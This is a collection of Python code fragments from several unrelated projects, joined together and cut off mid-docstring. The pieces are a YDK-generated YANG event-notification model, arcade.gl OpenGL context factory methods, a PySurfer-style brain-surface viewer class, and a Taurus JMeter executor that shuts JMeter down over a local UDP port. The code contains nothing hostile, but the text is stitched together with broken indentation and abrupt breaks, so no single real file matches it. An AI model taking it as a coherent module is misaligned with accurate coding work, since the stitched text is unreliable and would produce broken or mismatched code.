            self.ylist_key_names = ['filter_id']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('filter_id', (YLeaf(YType.uint32, 'filter-id'), ['int'])),
                ('filter', (YLeaf(YType.str, 'filter'), ['str'])),
                ('subtree_filter', (YLeaf(YType.str, 'ietf-yang-push:subtree-filter'), ['str'])),
                ('xpath_filter', (YLeaf(YType.str, 'ietf-yang-push:xpath-filter'), ['str'])),
            ])
            self.filter_id = None
            self.filter = None
            self.subtree_filter = None
            self.xpath_filter = None
            # The list key is embedded in the XPath segment.
            self._segment_path = lambda: "filter" + "[filter-id='" + str(self.filter_id) + "']"
            self._absolute_path = lambda: "ietf-event-notifications:filters/%s" % self._segment_path()
            self._is_frozen = True
        def __setattr__(self, name, value):
            # Route all attribute writes through YDK's validation hook.
            self._perform_setattr(Filters.Filter, ['filter_id', 'filter', 'subtree_filter', 'xpath_filter'], name, value)
    def clone_ptr(self):
        # Produce a fresh top-level Filters entity for YDK's cloning API.
        self._top_entity = Filters()
        return self._top_entity
class SubscriptionConfig(Entity):
"""
Contains the list of subscriptions that are configured,
as opposed to established via RPC or other means.
.. attribute:: subscription
Content of a subscription
**type**\: list of :py:class:`Subscription <ydk.models.ietf.ietf_event_notifications.SubscriptionConfig.Subscription>`
"""
_prefix = 'notif-bis'
_revision = '2016-10-27'
def __init__(self):
    """Build the subscription-config container with an empty subscription list."""
    super(SubscriptionConfig, self).__init__()
    self._top_entity = None
    # YANG metadata locating this container in the model tree.
    self.yang_name = "subscription-config"
    self.yang_parent_name = "ietf-event-notifications"
    self.is_top_level_class = True
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("subscription", ("subscription", SubscriptionConfig.Subscription))])
    self._leafs = OrderedDict()
    self.subscription = YList(self)
    self._segment_path = lambda: "ietf-event-notifications:subscription-config"
    self._is_frozen = True
def __setattr__(self, name, value):
    # Route all attribute writes through YDK's validation hook.
    self._perform_setattr(SubscriptionConfig, [], name, value)
class Subscription(Entity):
"""
Content of a subscription.
.. attribute:: subscription_id (key)
Identifier to use for this subscription
**type**\: int
**range:** 0..4294967295
.. attribute:: stream
Indicates which stream of events is of interest. If not present, events in the default NETCONF stream will be sent
**type**\: :py:class:`Stream <ydk.models.ietf.ietf_event_notifications.Stream>`
.. attribute:: encoding
The type of encoding for the subscribed data. Default is XML
**type**\: :py:class:`Encodings <ydk.models.ietf.ietf_event_notifications.Encodings>`
**default value**\: encode-xml
.. attribute:: filter
Filter per RFC 5277. Notification filter. If a filter element is specified to look for data of a particular value, and the data item is not present within a particular event notification for its value to be checked against, the notification will be filtered out. For example, if one were to check for 'severity=critical' in a configuration event notification where this field was not supported, then the notification would be filtered out. For subtree filtering, a non\-empty node set means that the filter matches. For XPath filtering, the mechanisms defined in [XPATH] should be used to convert the returned value to boolean
**type**\: anyxml
.. attribute:: filter_ref
References filter which is associated with the subscription
**type**\: int
**range:** 0..4294967295
**refers to**\: :py:class:`filter_id <ydk.models.ietf.ietf_event_notifications.Filters.Filter>`
.. attribute:: subtree_filter
Subtree\-filter used to specify the data nodes targeted for subscription within a subtree, or subtrees, of a conceptual YANG datastore. Objects matching the filter criteria will traverse the filter. The syntax follows the subtree filter syntax specified in RFC 6241, section 6
**type**\: anyxml
.. attribute:: xpath_filter
Xpath defining the data items of interest
**type**\: str
.. attribute:: starttime
Used to trigger the replay feature and indicate that the replay should start at the time specified. If <startTime> is not present, this is not a replay subscription. It is not valid to specify start times that are later than the current time. If the <startTime> specified is earlier than the log can support, the replay will begin with the earliest available notification. This parameter is of type dateTime and compliant to [RFC3339]. Implementations must support time zones
**type**\: str
**pattern:** \\d{4}\-\\d{2}\-\\d{2}T\\d{2}\:\\d{2}\:\\d{2}(\\.\\d+)?(Z\|[\\+\\\-]\\d{2}\:\\d{2})
.. attribute:: stoptime
Used with the | |
present) and subsequently used for tessellation.
:type: int
"""
value = c_int()
gl.glGetIntegerv(gl.GL_PATCH_VERTICES, value)
return value.value
@patch_vertices.setter
def patch_vertices(self, value: int):
    # GL expects a plain integer patch size; reject anything else.
    if isinstance(value, int):
        gl.glPatchParameteri(gl.GL_PATCH_VERTICES, value)
    else:
        raise TypeError("patch_vertices must be an integer")
@property
def point_size(self) -> float:
    """float: Get or set the point size."""
    # Returns the locally cached value; GL state is written by the setter.
    return self._point_size
@point_size.setter
def point_size(self, value: float):
    """Set the OpenGL point size and cache it locally."""
    # Cache the new value first, then push it to GL. The previous code
    # called glPointSize with the old cached value before updating it,
    # leaving the GL point-size state one assignment behind the property.
    self._point_size = value
    gl.glPointSize(value)
@property
def primitive_restart_index(self) -> int:
    """Get or set the primitive restart index. Default is -1"""
    # Returns the locally cached value; GL state is written by the setter.
    return self._primitive_restart_index
@primitive_restart_index.setter
def primitive_restart_index(self, value: int):
    # Cache the value, then update the GL primitive-restart state.
    self._primitive_restart_index = value
    gl.glPrimitiveRestartIndex(value)
def finish(self) -> None:
    """Wait until all OpenGL rendering commands are completed"""
    # Blocks until the GL has executed every previously issued command.
    gl.glFinish()
# --- Resource methods ---
def buffer(
    self, *, data: Optional[Any] = None, reserve: int = 0, usage: str = "static"
) -> Buffer:
    """Create a new OpenGL Buffer object bound to this context.
    :param Any data: The buffer data, This can be ``bytes`` or an object supporting the buffer protocol.
    :param int reserve: The number of bytes reserve
    :param str usage: Buffer usage. 'static', 'dynamic' or 'stream'
    :rtype: :py:class:`~arcade.gl.Buffer`
    """
    # create_with_size
    # Thin factory: Buffer handles allocation from either data or reserve.
    return Buffer(self, data, reserve=reserve, usage=usage)
def framebuffer(
    self,
    *,
    color_attachments: Union[Texture, List[Texture]] = None,
    depth_attachment: Texture = None
) -> Framebuffer:
    """Create a Framebuffer bound to this context.
    :param List[arcade.gl.Texture] color_attachments: List of textures we want to render into
    :param arcade.gl.Texture depth_attachment: Depth texture
    :rtype: :py:class:`~arcade.gl.Framebuffer`
    """
    # Thin factory: Framebuffer wires up the attachments itself.
    return Framebuffer(
        self, color_attachments=color_attachments, depth_attachment=depth_attachment
    )
def texture(
    self,
    size: Tuple[int, int],
    *,
    components: int = 4,
    dtype: str = "f1",
    data: Any = None,
    wrap_x: gl.GLenum = None,
    wrap_y: gl.GLenum = None,
    filter: Tuple[gl.GLenum, gl.GLenum] = None
) -> Texture:
    """Create a 2D Texture bound to this context.
    Wrap modes: ``GL_REPEAT``, ``GL_MIRRORED_REPEAT``, ``GL_CLAMP_TO_EDGE``, ``GL_CLAMP_TO_BORDER``
    Minifying filters: ``GL_NEAREST``, ``GL_LINEAR``, ``GL_NEAREST_MIPMAP_NEAREST``, ``GL_LINEAR_MIPMAP_NEAREST``
    ``GL_NEAREST_MIPMAP_LINEAR``, ``GL_LINEAR_MIPMAP_LINEAR``
    Magnifying filters: ``GL_NEAREST``, ``GL_LINEAR``
    :param Tuple[int, int] size: The size of the texture
    :param int components: Number of components (1: R, 2: RG, 3: RGB, 4: RGBA)
    :param str dtype: The data type of each component: f1, f2, f4 / i1, i2, i4 / u1, u2, u4
    :param Any data: The texture data (optional). Can be bytes or an object supporting the buffer protocol.
    :param GLenum wrap_x: How the texture wraps in x direction
    :param GLenum wrap_y: How the texture wraps in y direction
    :param Tuple[GLenum,GLenum] filter: Minification and magnification filter
    """
    # Thin factory: all parameter validation lives in Texture.
    return Texture(
        self,
        size,
        components=components,
        data=data,
        dtype=dtype,
        wrap_x=wrap_x,
        wrap_y=wrap_y,
        filter=filter,
    )
def depth_texture(self, size: Tuple[int, int], *, data=None) -> Texture:
    """Create a 2D depth texture bound to this context.
    :param Tuple[int, int] size: The size of the texture
    :param Any data: The texture data (optional). Can be bytes or an object supporting the buffer protocol.
    """
    # Same factory as texture(), but flagged as a depth attachment.
    return Texture(self, size, data=data, depth=True)
def geometry(
    self,
    content: Optional[Sequence[BufferDescription]] = None,
    index_buffer: Buffer = None,
    mode: int = None,
    index_element_size: int = 4,
):
    """
    Create a Geometry instance.
    :param list content: List of :py:class:`~arcade.gl.BufferDescription` (optional)
    :param Buffer index_buffer: Index/element buffer (optional)
    :param int mode: The default draw mode (optional)
    :param int index_element_size: Byte size of the index buffer type. Can be 1, 2 or 4 (8, 16 or 32 bit unsigned integer)
    """
    # Thin factory: Geometry interprets the buffer descriptions itself.
    return Geometry(self, content, index_buffer=index_buffer, mode=mode, index_element_size=index_element_size)
def program(
    self,
    *,
    vertex_shader: str,
    fragment_shader: str = None,
    geometry_shader: str = None,
    tess_control_shader: str = None,
    tess_evaluation_shader: str = None,
    defines: Dict[str, str] = None
) -> Program:
    """Create a :py:class:`~arcade.gl.Program` given the vertex, fragment and geometry shader.
    :param str vertex_shader: vertex shader source
    :param str fragment_shader: fragment shader source (optional)
    :param str geometry_shader: geometry shader source (optional)
    :param str tess_control_shader: tessellation control shader source (optional)
    :param str tess_evaluation_shader: tessellation evaluation shader source (optional)
    :param dict defines: Substitute #defines values in the source (optional)
    :rtype: :py:class:`~arcade.gl.Program`
    """
    def wrap(source, shader_type):
        # Wrap raw GLSL in a ShaderSource, passing None straight through.
        return ShaderSource(source, shader_type) if source else None

    source_vs = ShaderSource(vertex_shader, gl.GL_VERTEX_SHADER)
    source_fs = wrap(fragment_shader, gl.GL_FRAGMENT_SHADER)
    source_geo = wrap(geometry_shader, gl.GL_GEOMETRY_SHADER)
    source_tc = wrap(tess_control_shader, gl.GL_TESS_CONTROL_SHADER)
    source_te = wrap(tess_evaluation_shader, gl.GL_TESS_EVALUATION_SHADER)

    # If we don't have a fragment shader we are doing transform feedback.
    # When a geometry shader is present the out attributes will be located there.
    out_attributes = []  # type: List[str]
    if not source_fs:
        out_attributes = (source_geo or source_vs).out_attributes

    def final_source(src):
        # Apply #define substitutions, passing None straight through.
        return src.get_source(defines=defines) if src else None

    return Program(
        self,
        vertex_shader=source_vs.get_source(defines=defines),
        fragment_shader=final_source(source_fs),
        geometry_shader=final_source(source_geo),
        tess_control_shader=final_source(source_tc),
        tess_evaluation_shader=final_source(source_te),
        out_attributes=out_attributes,
    )
def query(self):
    """
    Create a query object for measuring rendering calls in opengl.
    :rtype: :py:class:`~arcade.gl.Query`
    """
    # Thin factory: Query sets up the GL query objects itself.
    return Query(self)
class ContextStats:
    """Tracks (created, freed) counts for each OpenGL resource type."""

    def __init__(self, warn_threshold=100):
        # A debug line is logged when a type's pre-increment creation count
        # is a positive multiple of this threshold.
        self.warn_threshold = warn_threshold
        # Each counter is a (created, freed) pair.
        self.texture = (0, 0)
        self.framebuffer = (0, 0)
        self.buffer = (0, 0)
        self.program = (0, 0)
        self.vertex_array = (0, 0)
        self.geometry = (0, 0)

    def incr(self, key):
        """Record one allocation for resource type *key*."""
        created, freed = getattr(self, key)
        setattr(self, key, (created + 1, freed))
        # Note: threshold test uses the pre-increment count, matching the
        # long-standing behavior of this counter.
        threshold_hit = created > 0 and created % self.warn_threshold == 0
        if threshold_hit:
            LOG.debug(
                "%s allocations passed threshold (%s) [created = %s] [freed = %s] [active = %s]",
                key,
                self.warn_threshold,
                created,
                freed,
                created - freed,
            )

    def decr(self, key):
        """Record one deallocation for resource type *key*."""
        created, freed = getattr(self, key)
        setattr(self, key, (created, freed + 1))
class Limits:
"""OpenGL Limitations"""
def __init__(self, ctx):
self._ctx = ctx
#: Minor version number of the OpenGL API supported by the current context
self.MINOR_VERSION = self.get(gl.GL_MINOR_VERSION)
#: Major version number of the OpenGL API supported by the current context.
self.MAJOR_VERSION = self.get(gl.GL_MAJOR_VERSION)
self.VENDOR = self.get_str(gl.GL_VENDOR)
self.RENDERER = self.get_str(gl.GL_RENDERER)
#: Value indicating the number of sample buffers associated with the framebuffer
self.SAMPLE_BUFFERS = self.get(gl.GL_SAMPLE_BUFFERS)
#: An estimate of the number of bits of subpixel resolution
#: that are used to position rasterized geometry in window coordinates
self.SUBPIXEL_BITS = self.get(gl.GL_SUBPIXEL_BITS)
#: A mask value indicating what context profile is used (core, compat etc.)
self.CONTEXT_PROFILE_MASK = self.get(gl.GL_CONTEXT_PROFILE_MASK)
#: Minimum required alignment for uniform buffer sizes and offset
self.UNIFORM_BUFFER_OFFSET_ALIGNMENT = self.get(
gl.GL_UNIFORM_BUFFER_OFFSET_ALIGNMENT
)
#: Value indicates the maximum number of layers allowed in an array texture, and must be at least 256
self.MAX_ARRAY_TEXTURE_LAYERS = self.get(gl.GL_MAX_ARRAY_TEXTURE_LAYERS)
#: A rough estimate of the largest 3D texture that the GL can handle. The value must be at least 64
self.MAX_3D_TEXTURE_SIZE = self.get(gl.GL_MAX_3D_TEXTURE_SIZE)
#: Maximum number of color attachments in a framebuffer
self.MAX_COLOR_ATTACHMENTS = self.get(gl.GL_MAX_COLOR_ATTACHMENTS)
#: Maximum number of samples in a color multisample texture
self.MAX_COLOR_TEXTURE_SAMPLES = self.get(gl.GL_MAX_COLOR_TEXTURE_SAMPLES)
#: the number of words for fragment shader uniform variables in all uniform blocks
self.MAX_COMBINED_FRAGMENT_UNIFORM_COMPONENTS = self.get(
gl.GL_MAX_COMBINED_FRAGMENT_UNIFORM_COMPONENTS
)
#: Number of words for geometry shader uniform variables in all uniform blocks
self.MAX_COMBINED_GEOMETRY_UNIFORM_COMPONENTS = self.get(
gl.GL_MAX_COMBINED_GEOMETRY_UNIFORM_COMPONENTS
)
#: Maximum supported texture image units that can be used to access texture maps from the vertex shader
self.MAX_COMBINED_TEXTURE_IMAGE_UNITS = self.get(
gl.GL_MAX_COMBINED_TEXTURE_IMAGE_UNITS
)
#: Maximum number of uniform blocks per program
self.MAX_COMBINED_UNIFORM_BLOCKS = self.get(gl.GL_MAX_COMBINED_UNIFORM_BLOCKS)
#: Number of words for vertex shader uniform variables in all uniform blocks
self.MAX_COMBINED_VERTEX_UNIFORM_COMPONENTS = self.get(
gl.GL_MAX_COMBINED_VERTEX_UNIFORM_COMPONENTS
)
#: A rough estimate of the largest cube-map texture that the GL can handle
self.MAX_CUBE_MAP_TEXTURE_SIZE = self.get(gl.GL_MAX_CUBE_MAP_TEXTURE_SIZE)
#: Maximum number of samples in a multisample depth or depth-stencil texture
self.MAX_DEPTH_TEXTURE_SAMPLES = self.get(gl.GL_MAX_DEPTH_TEXTURE_SAMPLES)
#: Maximum number of simultaneous outputs that may be written in a fragment shader
self.MAX_DRAW_BUFFERS = self.get(gl.GL_MAX_DRAW_BUFFERS)
#: Maximum number of active draw buffers when using dual-source blending
self.MAX_DUAL_SOURCE_DRAW_BUFFERS = self.get(gl.GL_MAX_DUAL_SOURCE_DRAW_BUFFERS)
#: Recommended maximum number of vertex array indices
self.MAX_ELEMENTS_INDICES = self.get(gl.GL_MAX_ELEMENTS_INDICES)
#: Recommended maximum number of vertex array vertices
self.MAX_ELEMENTS_VERTICES = self.get(gl.GL_MAX_ELEMENTS_VERTICES)
#: Maximum number of components of the inputs read by the fragment shader
self.MAX_FRAGMENT_INPUT_COMPONENTS = self.get(
gl.GL_MAX_FRAGMENT_INPUT_COMPONENTS
)
#: Maximum number of individual floating-point, integer, or boolean values that can be
#: held in uniform variable storage for a fragment shader
self.MAX_FRAGMENT_UNIFORM_COMPONENTS = self.get(
gl.GL_MAX_FRAGMENT_UNIFORM_COMPONENTS
)
#: maximum number of individual 4-vectors of floating-point, integer,
#: or boolean values that can be held in uniform variable storage for a fragment shader
self.MAX_FRAGMENT_UNIFORM_VECTORS = self.get(gl.GL_MAX_FRAGMENT_UNIFORM_VECTORS)
#: Maximum number of uniform blocks per fragment shader.
self.MAX_FRAGMENT_UNIFORM_BLOCKS = self.get(gl.GL_MAX_FRAGMENT_UNIFORM_BLOCKS)
#: Maximum number of components of inputs read by a geometry shader
self.MAX_GEOMETRY_INPUT_COMPONENTS = self.get(
| |
are displayed side-by-side
in different viewing panes.
surf : str
freesurfer surface mesh name (ie 'white', 'inflated', etc.)
title : str
title for the window
cortex : str, tuple, dict, or None
Specifies how the cortical surface is rendered. Options:
1. The name of one of the preset cortex styles:
``'classic'`` (default), ``'high_contrast'``,
``'low_contrast'``, or ``'bone'``.
2. A color-like argument to render the cortex as a single
color, e.g. ``'red'`` or ``(0.1, 0.4, 1.)``. Setting
this to ``None`` is equivalent to ``(0.5, 0.5, 0.5)``.
3. The name of a colormap used to render binarized
curvature values, e.g., ``Grays``.
4. A list of colors used to render binarized curvature
values. Only the first and last colors are used. E.g.,
['red', 'blue'] or [(1, 0, 0), (0, 0, 1)].
5. A container with four entries for colormap (string
specifiying the name of a colormap), vmin (float
specifying the minimum value for the colormap), vmax
(float specifying the maximum value for the colormap),
and reverse (bool specifying whether the colormap
should be reversed. E.g., ``('Greys', -1, 2, False)``.
6. A dict of keyword arguments that is passed on to the
call to surface.
alpha : float in [0, 1]
Alpha level to control opacity of the cortical surface.
size : float or pair of floats
the size of the window, in pixels. can be one number to specify
a square window, or the (width, height) of a rectangular window.
background : matplotlib color
Color of the background.
foreground : matplotlib color
Color of the foreground (will be used for colorbars and text).
None (default) will use black or white depending on the value
of ``background``.
figure : list of mayavi.core.scene.Scene | None | int
If None (default), a new window will be created with the appropriate
views. For single view plots, the figure can be specified as int to
retrieve the corresponding Mayavi window.
subjects_dir : str | None
If not None, this directory will be used as the subjects directory
instead of the value set using the SUBJECTS_DIR environment
variable.
views : list | str
views to use
offset : bool
If True, aligs origin with medial wall. Useful for viewing inflated
surface where hemispheres typically overlap (Default: True)
show_toolbar : bool
If True, toolbars will be shown for each view.
offscreen : bool | str
If True, rendering will be done offscreen (not shown). Useful
mostly for generating images or screenshots, but can be buggy.
Use at your own risk. Can be "auto" (default) to use
``mlab.options.offscreen``.
interaction : str
Can be "trackball" (default) or "terrain", i.e. a turntable-style
camera.
units : str
Can be 'm' or 'mm' (default).
Attributes
----------
annot : list
List of annotations.
brains : list
List of the underlying brain instances.
contour : list
List of the contours.
foci : foci
The foci.
labels : dict
The labels.
overlays : dict
The overlays.
texts : dict
The text objects.
"""
def __init__(self, subject_id, hemi, surf, title=None,
             cortex="classic", alpha=1.0, size=800, background="black",
             foreground=None, figure=None, subjects_dir=None,
             views=['lat'], offset=True, show_toolbar=False,
             offscreen='auto', interaction='trackball', units='mm'):
    # Parameters are documented in the class docstring.
    if not isinstance(interaction, string_types) or \
            interaction not in ('trackball', 'terrain'):
        raise ValueError('interaction must be "trackball" or "terrain", '
                         'got "%s"' % (interaction,))
    self._units = _check_units(units)
    col_dict = dict(lh=1, rh=1, both=1, split=2)
    # BUG FIX: validate hemi *before* indexing col_dict. Previously the
    # lookup ran first, so an invalid hemi raised a bare KeyError and the
    # informative ValueError below was unreachable.
    if hemi not in col_dict:
        raise ValueError('hemi must be one of [%s], not %s'
                         % (', '.join(col_dict.keys()), hemi))
    n_col = col_dict[hemi]
    # Get the subjects directory from parameter or env. var
    subjects_dir = _get_subjects_dir(subjects_dir=subjects_dir)
    self._hemi = hemi
    if title is None:
        title = subject_id
    self.subject_id = subject_id
    if not isinstance(views, list):
        views = [views]
    n_row = len(views)
    # load geometry for one or both hemispheres as necessary;
    # offset only applies when both hemispheres share one scene
    offset = None if (not offset or hemi != 'both') else 0.0
    self.geo = dict()
    # hemi already validated above, so these branches are exhaustive
    geo_hemis = ['lh', 'rh'] if hemi in ('split', 'both') else [hemi]
    geo_kwargs, geo_reverse, geo_curv = self._get_geo_params(cortex, alpha)
    for h in geo_hemis:
        # Initialize a Surface object as the geometry
        geo = Surface(subject_id, h, surf, subjects_dir, offset,
                      units=self._units)
        # Load in the geometry and (maybe) curvature
        geo.load_geometry()
        if geo_curv:
            geo.load_curvature()
        self.geo[h] = geo
    # deal with making figures
    self._set_window_properties(size, background, foreground)
    del background, foreground
    figures, _v = _make_viewer(figure, n_row, n_col, title,
                               self._scene_size, offscreen,
                               interaction)
    self._figures = figures
    self._v = _v
    self._window_backend = 'Mayavi' if self._v is None else 'TraitsUI'
    for ff in self._figures:
        for f in ff:
            if f.scene is not None:
                f.scene.background = self._bg_color
                f.scene.foreground = self._fg_color
    # force rendering so scene.lights exists
    _force_render(self._figures)
    self.toggle_toolbars(show_toolbar)
    _force_render(self._figures)
    # disable rendering while the brains are filled in (speed-up)
    self._toggle_render(False)
    # fill figures with brains
    kwargs = dict(geo_curv=geo_curv, geo_kwargs=geo_kwargs,
                  geo_reverse=geo_reverse, subjects_dir=subjects_dir,
                  bg_color=self._bg_color, fg_color=self._fg_color)
    brains = []
    brain_matrix = []
    for ri, view in enumerate(views):
        brain_row = []
        for hi, h in enumerate(['lh', 'rh']):
            if not (hemi in ['lh', 'rh'] and h != hemi):
                # only 'split' mode uses a second figure column
                ci = hi if hemi == 'split' else 0
                kwargs['hemi'] = h
                kwargs['geo'] = self.geo[h]
                kwargs['figure'] = figures[ri][ci]
                kwargs['backend'] = self._window_backend
                brain = _Hemisphere(subject_id, **kwargs)
                brain.show_view(view)
                brains += [dict(row=ri, col=ci, brain=brain, hemi=h)]
                brain_row += [brain]
        brain_matrix += [brain_row]
    self._toggle_render(True)
    self._original_views = views
    self._brain_list = brains
    for brain in self._brain_list:
        brain['brain']._orient_lights()
    self.brains = [b['brain'] for b in brains]
    self.brain_matrix = np.array(brain_matrix)
    self.subjects_dir = subjects_dir
    self.surf = surf
    # Initialize the overlay and label dictionaries
    self.foci_dict = dict()
    self._label_dicts = dict()
    self.overlays_dict = dict()
    self.contour_list = []
    self.morphometry_list = []
    self.annot_list = []
    self._data_dicts = dict(lh=[], rh=[])
    # note that texts gets treated differently
    self.texts_dict = dict()
    self._times = None
    self.n_times = None
@property
def data_dict(self):
    """Most recently added data dict per hemisphere (backwards compat)."""
    out = dict()
    for hemi_key in ('lh', 'rh'):
        hemi_list = self._data_dicts[hemi_key]
        out[hemi_key] = hemi_list[-1] if hemi_list else None
    return out
@property
def labels_dict(self):
    """Mapping from label name to its surfaces (backwards compat)."""
    out = dict()
    for key, data in self._label_dicts.items():
        out[key] = data['surfaces']
    return out
###########################################################################
# HELPERS
def _toggle_render(self, state, views=None):
    """Turn rendering on (True) or off (False).

    When disabling rendering, the current camera state (view, roll,
    parallel scale) of each figure is captured into the returned list so a
    later enabling call can restore it.

    Parameters
    ----------
    state : bool
        True to enable rendering, False to disable it.
    views : list | None
        Camera states captured by a previous disabling call; restored when
        ``state`` is True. None allocates fresh placeholders.

    Returns
    -------
    views : list
        One entry per figure; filled with camera state when disabling.
    """
    figs = [fig for fig_row in self._figures for fig in fig_row]
    if views is None:
        views = [None] * len(figs)
    for vi, (_f, view) in enumerate(zip(figs, views)):
        # Testing backend doesn't have these options
        if mlab.options.backend == 'test':
            continue
        if state is False and view is None:
            # capture the camera so it can be restored on re-enable
            views[vi] = (mlab.view(figure=_f), mlab.roll(figure=_f),
                         _f.scene.camera.parallel_scale
                         if _f.scene is not None else False)
        if _f.scene is not None:
            _f.scene.disable_render = not state
        if state is True and view is not None and _f.scene is not None:
            mlab.draw(figure=_f)
            with warnings.catch_warnings(record=True):  # traits focalpoint
                mlab.view(*view[0], figure=_f)
                mlab.roll(view[1], figure=_f)
    # let's do the ugly force draw
    if state is True:
        _force_render(self._figures)
    return views
def _set_window_properties(self, size, background, foreground):
    """Derive scene size and fore-/background RGB colors used elsewhere."""
    # a scalar "size" means a square window; a pair is (width, height)
    from matplotlib.colors import colorConverter
    try:
        width, height = size
    except (TypeError, ValueError):
        width = height = size
    self._scene_size = height, width
    self._bg_color = colorConverter.to_rgb(background)
    if foreground is None:
        # pick a foreground that contrasts with the background
        foreground = 'w' if sum(self._bg_color) < 2 else 'k'
    self._fg_color = colorConverter.to_rgb(foreground)
def _get_geo_params(self, cortex, alpha=1.0):
"""Return keyword arguments and other parameters for surface
rendering.
Parameters
----------
cortex : {str, tuple, dict, None}
Can be set to: (1) the name of one of the preset cortex
styles ('classic', 'high_contrast', 'low_contrast', or
'bone'), (2) the name of a colormap, (3) a tuple with
four entries for (colormap, vmin, vmax, reverse)
indicating the name of the colormap, the min and max
values respectively and whether or not the colormap should
be reversed, (4) a valid color specification (such as a
3-tuple with RGB values or a valid color name), or (5) a
dictionary of keyword arguments that is passed on to the
call to surface. If set to None, color is set to (0.5,
0.5, 0.5).
alpha : float in [0, 1]
Alpha level to control opacity of the cortical surface.
Returns
-------
kwargs : dict
Dictionary with keyword arguments to be used for surface
rendering. For colormaps, keys are ['colormap', | |
contains
any data and throws exception otherwise.
:return: bool
:raise ToolError:
"""
self.retcode = self.process.poll()
if self.retcode is not None:
if self.retcode != 0:
raise ToolError("JMeter exited with non-zero code: %s" % self.retcode, self.get_error_diagnostics())
return True
return False
def shutdown(self):
    """
    If JMeter is still running - let's stop it.

    Tries graceful ``Shutdown`` then ``StopTestNow`` UDP commands on the
    management port; kills the process if it survives both.
    """
    max_attempts = self.settings.get("shutdown-wait", 5)
    if self._process_stopped(1):
        return
    try:
        if not self.settings.get("gui", False):
            udp_sock = socket.socket(type=socket.SOCK_DGRAM)
            try:
                self.log.info("Sending Shutdown command to JMeter on port %d...", self.management_port)
                udp_sock.sendto(b"Shutdown", ("localhost", self.management_port))
                if self._process_stopped(max_attempts):
                    self.log.debug("JMeter stopped on Shutdown command")
                    return
                self.log.info("Sending StopTestNow command to JMeter on port %d...", self.management_port)
                udp_sock.sendto(b"StopTestNow", ("localhost", self.management_port))
                if self._process_stopped(max_attempts):
                    self.log.debug("JMeter stopped on StopTestNow command")
                    return
            finally:
                # FIX: close the probe socket — it was leaked before
                udp_sock.close()
    finally:
        if not self._process_stopped(1):
            self.log.warning("JMeter process is still alive, killing it")
            shutdown_process(self.process, self.log)
    if self.start_time:
        self.end_time = time.time()
        self.log.debug("JMeter worked for %s seconds", self.end_time - self.start_time)
def post_process(self):
    """Keep the modified JMX as an artifact and close captured std streams."""
    self.engine.existing_artifact(self.modified_jmx, True)
    for stream in (self.stdout_file, self.stderr_file):
        if stream:
            stream.close()
def has_results(self):
    """Whether the JTL reader has seen at least one sample record."""
    return bool(self.reader and self.reader.read_records)
def _process_stopped(self, cycles):
    """Poll the child process up to `cycles` times; True once it has exited."""
    remaining = cycles
    while remaining > 0:
        remaining -= 1
        if not (self.process and self.process.poll() is None):
            return True
        # still alive — wait one engine tick before polling again
        time.sleep(self.engine.check_interval)
    return False
def _set_remote_port(self):
    """
    Pick a free UDP port for JMeter's management interface.

    The port counter lives on the class so concurrent executors get
    distinct ports.
    :raise TaurusInternalException: when no free port is available
    """
    if not JMeterExecutor.UDP_PORT_NUMBER:
        JMeterExecutor.UDP_PORT_NUMBER = self.settings.get("shutdown-port", 4445)
    else:
        JMeterExecutor.UDP_PORT_NUMBER += 1
    while not self.__port_is_free(JMeterExecutor.UDP_PORT_NUMBER):
        self.log.debug("Port %d is busy, trying next one", JMeterExecutor.UDP_PORT_NUMBER)
        if JMeterExecutor.UDP_PORT_NUMBER == 65535:
            # BUG FIX: the exception was instantiated but never raised,
            # leaving the loop spinning forever at port 65535
            raise TaurusInternalException("JMeter: no free ports for management interface")
        JMeterExecutor.UDP_PORT_NUMBER += 1
    self.management_port = JMeterExecutor.UDP_PORT_NUMBER
    self.log.debug("Using port %d for management", self.management_port)
def __port_is_free(self, port_num):
    """
    Check whether UDP `port_num` on localhost can be bound.
    :return: Bool
    """
    udp_sock = socket.socket(type=socket.SOCK_DGRAM)
    self.log.debug("Checking if port %d is free", port_num)
    try:
        udp_sock.bind(("localhost", port_num))
    except socket.error:
        self.log.debug("Port %d is busy", port_num)
        return False
    finally:
        # FIX: always close the probe socket — it leaked when bind() failed
        udp_sock.close()
    self.log.debug("Port %d is free", port_num)
    return True
@staticmethod
def __disable_listeners(jmx):
    """
    Disable every ResultCollector that has no output file configured.
    :param jmx: JMX
    """
    xpath = GenericTranslator().css_to_xpath('stringProp[name=filename]')
    for listener in jmx.get('ResultCollector'):
        file_props = listener.xpath(xpath)
        if not (file_props and file_props[0].text):
            listener.set("enabled", "false")
def __apply_test_mode(self, jmx):
    """Sync the TestPlan's functional-mode flag with the engine's mode."""
    func_mode = self.engine.is_functional_mode()
    test_plan_selector = "jmeterTestPlan>hashTree>TestPlan"
    plans = jmx.get(test_plan_selector)
    if not plans:
        self.log.warning("No test plans, can't set test mode")
        return
    test_plan = plans[0]
    # update the boolProp in place if the plan already declares it
    props = test_plan.xpath('boolProp[@name="TestPlan.functional_mode"]')
    if props:
        prop = props[0]
        prop.text = "true" if func_mode else "false"
    else:
        # NOTE(review): reaches into JMX's private helper to build the
        # element — confirm this is the intended API
        element = jmx._get_functional_mode_prop(func_mode)
        jmx.append(test_plan_selector, element)
@staticmethod
def __fill_empty_delimiters(jmx):
    """Default any CSVDataSet with an empty delimiter to a comma."""
    for prop in jmx.get("CSVDataSet>stringProp[name='delimiter']"):
        if not prop.text:
            prop.text = ','
@staticmethod
def __add_listener(lst, jmx):
    """Append a listener element (plus its paired hashTree) to the test plan."""
    sel = JMeterScenarioBuilder.TEST_PLAN_SEL
    jmx.append(sel, lst)
    jmx.append(sel, etree.Element("hashTree"))
def __add_result_listeners(self, jmx):
    """Attach result listeners matching the engine's current test mode."""
    if not self.engine.is_functional_mode():
        self.__add_result_writers(jmx)
    else:
        self.__add_trace_writer(jmx)
def __add_trace_writer(self, jmx):
    """Add a full-trace XML JTL listener (used in functional mode)."""
    self.log_jtl = self.engine.create_artifact("trace", ".jtl")
    listener = jmx.new_xml_listener(self.log_jtl, True,
                                    self.settings.get('xml-jtl-flags'))
    self.__add_listener(listener, jmx)
def __add_result_writers(self, jmx):
    """Add the KPI CSV listener and, depending on config, an XML JTL one."""
    version = LooseVersion(str(self.settings.get('version', self.JMETER_VER)))
    kpi_flags = {}
    if version < LooseVersion("2.13"):
        # connectTime field is unsupported before JMeter 2.13
        kpi_flags['^connectTime'] = False
    self.kpi_jtl = self.engine.create_artifact("kpi", ".jtl")
